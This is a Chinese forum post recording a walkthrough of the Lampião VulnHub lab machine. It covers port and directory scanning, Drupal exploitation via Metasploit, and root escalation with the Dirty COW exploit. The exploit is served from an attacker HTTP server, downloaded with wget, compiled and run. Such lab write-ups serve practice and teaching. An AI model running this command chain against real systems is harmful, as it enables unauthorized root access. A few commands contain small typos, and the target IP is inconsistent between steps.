电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

[WEB前端技术] Lampião打靶记录

[复制链接]
 楼主| zhaorong 发表于 2022-10-28 14:33:38 | 显示全部楼层 |阅读模式
一、前期准备

1.下载地址

https://www.vulnhub.com/entry/lampiao-1,249/#download

1665325135_6342d84f1a6f84cc7c8e0.png

2、导入

1665325275_6342d8db2c4d4c5a03ef4.png

3、网络设置

桥接至物理网卡后启动。

1665325385_6342d949b831ad8a6baad.png

二、信息收集

1、发现靶场ip

6666888.png

666687.png

2、全端口扫描

nmap -Pn -p 0-65535 -O 192.168.0.101

666686.png

3、目录扫描

python3 dirsearch.py -u http://192.168.0.101:1898/-x 403

python3 dirsearch.py -u http://192.168.0.101

66685.png

66684.png

4、发现敏感信息

访问特殊文件,发现爆出drupal框架版本

http://192.168.0.101:1898/CHANGELOG.txt

66683.png

信息收集:drupal

Drupal是使用PHP语言编写的开源内容管理框架(CMF)

漏洞查询:查询后发现存在大量的版本漏洞

三、漏洞利用

1、启动msfconsole

搜索Drupal漏洞exp

search drupal

66682.png

2、根据信息收集

根据版本进行漏洞测试

show option #查看参数
set rhost 192.168.0.101 # 服务远程ip
set rport 1898 # 服务端口
exploit #启动

66681.png

利用成功。获取shell

66680.png

四、提权

1、信息收集

uname -a

66669.png

第一个版本Ubuntu 4.10即发行于2004年10月20日

尝试使用脏牛提权。

上传提权漏洞检测脚本。

66668.png

2、漏洞检测脚本执行

chmod +777 1.sh

/1.sh

66667.png

3、发现脏牛漏洞

脏牛漏洞利用简单,利用成功率高

寻找提权脚本
searchsploit dirty  #查看脚本
locate   linux/local/40847.cpp   #寻找脚本所在位置
scp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /tmp #复制文件到 /tmp

66663.png

python3 -m http.server 800 #启用http服务

66662.png

wget http://192.168.0.110:800/40847.cpp  #下载文件
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil   # 编译文件
chmod +777 40847
./40847z

4、执行成功

显示密码

66661.png

5、连接:

ssh root@192.168.0.104

66659.png
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 07:19

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表